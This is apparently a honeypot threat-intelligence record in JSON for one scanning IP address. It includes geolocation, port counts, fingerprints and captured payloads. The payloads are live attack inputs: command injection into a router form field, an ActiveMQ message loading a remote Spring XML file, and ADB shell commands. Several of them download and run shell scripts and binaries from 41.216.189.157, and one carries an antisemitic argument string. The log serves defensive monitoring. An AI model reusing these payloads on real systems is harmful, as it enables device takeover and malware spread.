{"ip":"94.154.43.192","total_events":51,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":null,"why":["51 event(s), fewer than 10 distinct ports, no exploit payloads.","Not in any known-scanner range."]},"first_seen":"2026-06-29T16:37:55","last_seen":"2026-07-04T06:36:05","events_24h":3,"events_7d":51,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"North Holland","city":"Amsterdam","lat":52.3716,"lon":4.8883,"asn":219502,"org":"Storm Industries LLC"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[],"malware":[],"top_ports":[{"port":61616,"proto":"tcp","label":"ActiveMQ","count":26},{"port":8080,"proto":"tcp","label":"HTTP-alt","count":21},{"port":5555,"proto":"tcp","label":"","count":3},{"port":6001,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn07en_f8f3b1e8e10e","po11cn0400_1be6d51fc57d"]},"fingerprint_peers":{"po11cn0400_1be6d51fc57d":3,"ge11nn07en_f8f3b1e8e10e":13},"user_agents":["Go-http-client/1.1","KrebsOnSecurity"],"timeline":[{"date":"2026-06-29","count":6},{"date":"2026-06-30","count":14},{"date":"2026-07-01","count":5},{"date":"2026-07-02","count":9},{"date":"2026-07-03","count":14},{"date":"2026-07-04","count":3}],"recent_events":[{"timestamp":"2026-07-04T06:36:05","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"content-length\":\"152\",\"cookie\":\"user=admin\",\"host\":\"<HONEYPOT>:8080\",\"user-agent\":\"Go-http-client/1.1\"}","body":"time1=00:00-00:00&time2=00:00-00:00&mac=;wget 41.216.189.157/nz.sh; curl -O 41.216.189.157/nz.sh; chmod 777 nz.sh; sh nz.sh; rm -rf nz.sh; rm -rf nz.sh*","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/goform/set_LimitClient_cfg","summary":"","payload_hex":"504f5354202f676f666f726d2f7365745f4c696d6974436c69656e745f63666720485454502f312e310d0a486f73743a20<HONEYPOT>3a383038300d0a557365722d4167656e743a20476f2d687474702d636c69656e742f312e310d0a436f6e74656e742d4c656e6774683a203135320d0a436f6f6b69653a20757365723d61646d696e0d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a74696d65313d30303a30302d30303a30302674696d65323d30303a30302d30303a3030266d61633d3b776765742034312e3231362e3138392e3135372f6e7a2e73683b206375726c202d4f2034312e3231362e3138392e3135372f6e7a2e73683b2063686d6f6420373737206e7a2e73683b207368206e7a2e73683b20726d202d7266206e7a2e73683b20726d202d7266206e7a2e73682a","method":"POST","user_agent":"Go-http-client/1.1","community_id":"1:e66YeLjodJaDP/PRZX+je7rE28U=","ja3":"","session":"c8742bbe-c660-4efd-9dbd-c50a7c4ddef0","seq":1,"duration_ms":100,"bytes_in":318,"bytes_out":78},{"timestamp":"2026-07-04T06:24:09","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"content-length\":\"152\",\"cookie\":\"user=admin\",\"host\":\"<HONEYPOT>:8080\",\"user-agent\":\"Go-http-client/1.1\"}","body":"time1=00:00-00:00&time2=00:00-00:00&mac=;wget 41.216.189.157/nz.sh; curl -O 41.216.189.157/nz.sh; chmod 777 nz.sh; sh nz.sh; rm -rf nz.sh; rm -rf nz.sh*","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/goform/set_LimitClient_cfg","summary":"","payload_hex":"504f5354202f676f666f726d2f7365745f4c696d6974436c69656e745f63666720485454502f312e310d0a486f73743a20<HONEYPOT>3a383038300d0a557365722d4167656e743a20476f2d687474702d636c69656e742f312e310d0a436f6e74656e742d4c656e6774683a203135320d0a436f6f6b69653a20757365723d61646d696e0d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a74696d65313d30303a30302d30303a30302674696d65323d30303a30302d30303a3030266d61633d3b776765742034312e3231362e3138392e3135372f6e7a2e73683b206375726c202d4f2034312e3231362e3138392e3135372f6e7a2e73683b2063686d6f6420373737206e7a2e73683b207368206e7a2e73683b20726d202d7266206e7a2e73683b20726d202d7266206e7a2e73682a","method":"POST","user_agent":"Go-http-client/1.1","community_id":"1:9W+CKg+s18yzcfqwYMlPV04f2S4=","ja3":"","session":"6af124f2-d4bd-4d0d-9c80-dd2509e02f90","seq":1,"duration_ms":100,"bytes_in":319,"bytes_out":78},{"timestamp":"2026-07-04T05:48:22","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"content-length\":\"152\",\"cookie\":\"user=admin\",\"host\":\"<HONEYPOT>:8080\",\"user-agent\":\"Go-http-client/1.1\"}","body":"time1=00:00-00:00&time2=00:00-00:00&mac=;wget 41.216.189.157/nz.sh; curl -O 41.216.189.157/nz.sh; chmod 777 nz.sh; sh nz.sh; rm -rf nz.sh; rm -rf nz.sh*","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/goform/set_LimitClient_cfg","summary":"","payload_hex":"504f5354202f676f666f726d2f7365745f4c696d6974436c69656e745f63666720485454502f312e310d0a486f73743a20<HONEYPOT>3a383038300d0a557365722d4167656e743a20476f2d687474702d636c69656e742f312e310d0a436f6e74656e742d4c656e6774683a203135320d0a436f6f6b69653a20757365723d61646d696e0d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a74696d65313d30303a30302d30303a30302674696d65323d30303a30302d30303a3030266d61633d3b776765742034312e3231362e3138392e3135372f6e7a2e73683b206375726c202d4f2034312e3231362e3138392e3135372f6e7a2e73683b2063686d6f6420373737206e7a2e73683b207368206e7a2e73683b20726d202d7266206e7a2e73683b20726d202d7266206e7a2e73682a","method":"POST","user_agent":"Go-http-client/1.1","community_id":"1:7qBXO8MzpenjYsjk9RqUpKh90is=","ja3":"","session":"1e096090-499a-46e9-a88e-8cd3d322e9bd","seq":1,"duration_ms":100,"bytes_in":318,"bytes_out":78},{"timestamp":"2026-07-03T21:47:04","port":61616,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\u0000\u0000\u0000r\u001f\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0001\u0001\u0000Borg.springframework.context.support.ClassPathXmlApplicationContext\u0001\u0000\u001fhttp://41.216.189.157/nz/o.xml\r","payload_hex":"000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f34312e3231362e3138392e3135372f6e7a2f6f2e786d6c0d","method":"","user_agent":"","community_id":"1:BYbBIfq8dRYWidjF7jw3EUj+i5Y=","ja3":"","session":"a7cbbf78-eacd-4f05-85a1-b8f050e381fa","seq":1,"duration_ms":0,"bytes_in":118,"bytes_out":13,"enriched":{"digest":"004ae75dbfb42e46","strings":["Borg.springframework.context.support.ClassPathXmlApplicationContext","http://41.216.189.157/nz/o.xml"],"iocs":{"urls":["http://41.216.189.157/nz/o.xml"],"ips":["41.216.189.157"],"domains":["borg.springframework.context.support"],"paths":["/41.216.189.157/nz/o.xml"]}}},{"timestamp":"2026-07-03T21:39:30","port":61616,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\u0000\u0000\u0000r\u001f\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0001\u0001\u0000Borg.springframework.context.support.ClassPathXmlApplicationContext\u0001\u0000\u001fhttp://41.216.189.157/nz/o.xml\r","payload_hex":"000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f34312e3231362e3138392e3135372f6e7a2f6f2e786d6c0d","method":"","user_agent":"","community_id":"1:cULxSXgmbI1UicMaEejwldL+l8I=","ja3":"","session":"d17a329d-5375-4e17-bcfa-6e72611c0c20","seq":1,"duration_ms":0,"bytes_in":118,"bytes_out":13,"enriched":{"digest":"004ae75dbfb42e46","strings":["Borg.springframework.context.support.ClassPathXmlApplicationContext","http://41.216.189.157/nz/o.xml"],"iocs":{"urls":["http://41.216.189.157/nz/o.xml"],"ips":["41.216.189.157"],"domains":["borg.springframework.context.support"],"paths":["/41.216.189.157/nz/o.xml"]}}},{"timestamp":"2026-07-03T19:30:04","port":61616,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\u0000\u0000\u0000r\u001f\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0001\u0001\u0000Borg.springframework.context.support.ClassPathXmlApplicationContext\u0001\u0000\u001fhttp://41.216.189.157/nz/o.xml\r","payload_hex":"000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f34312e3231362e3138392e3135372f6e7a2f6f2e786d6c0d","method":"","user_agent":"","community_id":"1:EVYcLZScMz/t68nyHKC4tYhVjy8=","ja3":"","session":"46dda21c-049e-4e6b-93e6-24e6f96d56f2","seq":1,"duration_ms":0,"bytes_in":118,"bytes_out":13,"enriched":{"digest":"004ae75dbfb42e46","strings":["Borg.springframework.context.support.ClassPathXmlApplicationContext","http://41.216.189.157/nz/o.xml"],"iocs":{"urls":["http://41.216.189.157/nz/o.xml"],"ips":["41.216.189.157"],"domains":["borg.springframework.context.support"],"paths":["/41.216.189.157/nz/o.xml"]}}},{"timestamp":"2026-07-03T19:09:32","port":5555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000H\u0001\u0000\u0000Rd\u0000\u0000����shell:cd /data/local/tmp/; busybox wget http://41.216.189.157/w.sh; sh w.sh; curl http://41.216.189.157/nz.sh; sh nz.sh; wget http://41.216.189.157/wget.sh; sh wget.sh; curl http://41.216.189.157/wget.sh; sh wget.sh; busybox wget http://41.216.189.157/wget.sh; sh wget.sh; busybox curl http://41.216.189.157/wget.sh; sh wget.sh\u0000","payload_hex":"4f50454e58010000000000004801000052640000b0afbab17368656c6c3a6364202f646174612f6c6f63616c2f746d702f3b2062757379626f78207767657420687474703a2f2f34312e3231362e3138392e3135372f772e73683b20736820772e73683b206375726c20687474703a2f2f34312e3231362e3138392e3135372f6e7a2e73683b207368206e7a2e73683b207767657420687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e73683b206375726c20687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e73683b2062757379626f78207767657420687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e73683b2062757379626f78206375726c20687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e736800","method":"","user_agent":"","community_id":"1:iN5d+qUKi2o/uxmIJuHimDshi0E=","ja3":"","session":"1015d14d-9baa-4383-b449-6041f242194b","seq":2,"duration_ms":524,"bytes_in":403,"bytes_out":26,"enriched":{"digest":"10ff681e6eea1692","strings":["OPENX","shell:cd /data/local/tmp/; busybox wget http://41.216.189.157/w.sh; sh w.sh; cur…"],"iocs":{"urls":["http://41.216.189.157/w.sh;"],"ips":["41.216.189.157"],"domains":["w.sh"],"paths":["/data/local/tmp","/41.216.189.157/w.sh"]}}},{"timestamp":"2026-07-03T19:09:31","port":5555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2","payload_hex":"434e584e00000001000004001b0000004d0a0000bcb1a7b1686f73743a3a66656174757265733d636d642c7368656c6c5f7632","method":"","user_agent":"","community_id":"1:iN5d+qUKi2o/uxmIJuHimDshi0E=","ja3":"","session":"1015d14d-9baa-4383-b449-6041f242194b","seq":1,"duration_ms":100,"bytes_in":51,"bytes_out":13,"enriched":{"digest":"9cb45602096504b5","strings":["CNXN","host::features=cmd,shell_v2"]}},{"timestamp":"2026-07-03T15:25:35","port":5555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000H\u0001\u0000\u0000Rd\u0000\u0000����shell:cd /data/local/tmp/; busybox wget http://41.216.189.157/w.sh; sh w.sh; curl http://41.216.189.157/nz.sh; sh nz.sh; wget http://41.216.189.157/wget.sh; sh wget.sh; curl http://41.216.189.157/wget.sh; sh wget.sh; busybox wget http://41.216.189.157/wget.sh; sh wget.sh; busybox curl http://41.216.189.157/wget.sh; sh wget.sh\u0000","payload_hex":"434e584e00000001000004001b0000004d0a0000bcb1a7b1686f73743a3a66656174757265733d636d642c7368656c6c5f76324f50454e58010000000000004801000052640000b0afbab17368656c6c3a6364202f646174612f6c6f63616c2f746d702f3b2062757379626f78207767657420687474703a2f2f34312e3231362e3138392e3135372f772e73683b20736820772e73683b206375726c20687474703a2f2f34312e3231362e3138392e3135372f6e7a2e73683b207368206e7a2e73683b207767657420687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e73683b206375726c20687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e73683b2062757379626f78207767657420687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e73683b2062757379626f78206375726c20687474703a2f2f34312e3231362e3138392e3135372f776765742e73683b20736820776765742e736800","method":"","user_agent":"","community_id":"1:fwZ5gKX5KJ0aHp8nHWdh6mLuxYg=","ja3":"","session":"30142cca-b833-4afb-9ef5-55938cfe471a","seq":1,"duration_ms":100,"bytes_in":403,"bytes_out":13,"enriched":{"digest":"a7edb7c40f933ce5","strings":["CNXN","host::features=cmd,shell_v2OPENX","shell:cd /data/local/tmp/; busybox wget http://41.216.189.157/w.sh; sh w.sh; cur…"],"iocs":{"urls":["http://41.216.189.157/w.sh;"],"ips":["41.216.189.157"],"domains":["w.sh"],"paths":["/data/local/tmp","/41.216.189.157/w.sh"]}}},{"timestamp":"2026-07-03T13:54:21","port":61616,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\u0000\u0000\u0000r\u001f\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0001\u0001\u0000Borg.springframework.context.support.ClassPathXmlApplicationContext\u0001\u0000\u001fhttp://41.216.189.157/nz/o.xml\r","payload_hex":"000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f34312e3231362e3138392e3135372f6e7a2f6f2e786d6c0d","method":"","user_agent":"","community_id":"1:14mZ63ljhUEfW0AZ2xbbQaf+Wrc=","ja3":"","session":"ffdf5cac-6795-4b95-b69a-ed605f247715","seq":1,"duration_ms":0,"bytes_in":118,"bytes_out":13,"enriched":{"digest":"004ae75dbfb42e46","strings":["Borg.springframework.context.support.ClassPathXmlApplicationContext","http://41.216.189.157/nz/o.xml"],"iocs":{"urls":["http://41.216.189.157/nz/o.xml"],"ips":["41.216.189.157"],"domains":["borg.springframework.context.support"],"paths":["/41.216.189.157/nz/o.xml"]}}}],"http_methods":[{"method":"POST","count":21},{"method":"GET","count":1}],"distinct_ports_total":4,"top_paths":[{"path":"/goform/set_LimitClient_cfg","count":21,"ports":1},{"path":"/shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/1.1.1.1/arm7;chmod+777+arm7;./arm7+jews;wget+http:/\\/1.1.1.1/arm;chmod+777+arm;./arm+jews;rm+-rf+*","count":1,"ports":1}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept-Encoding","Content-Length","Cookie","Host","User-Agent"],"representative":[{"name":"Accept-Encoding","value":"gzip","notable":false},{"name":"Content-Length","value":"152","notable":false},{"name":"Cookie","value":"user=admin","notable":true},{"name":"Host","value":"<HONEYPOT>:8080","notable":false},{"name":"User-Agent","value":"Go-http-client/1.1","notable":false}],"distinct_sets":1,"events_with_headers":3},"tags":[],"data_as_of":"2026-07-04T22:43:03.615994+00:00"}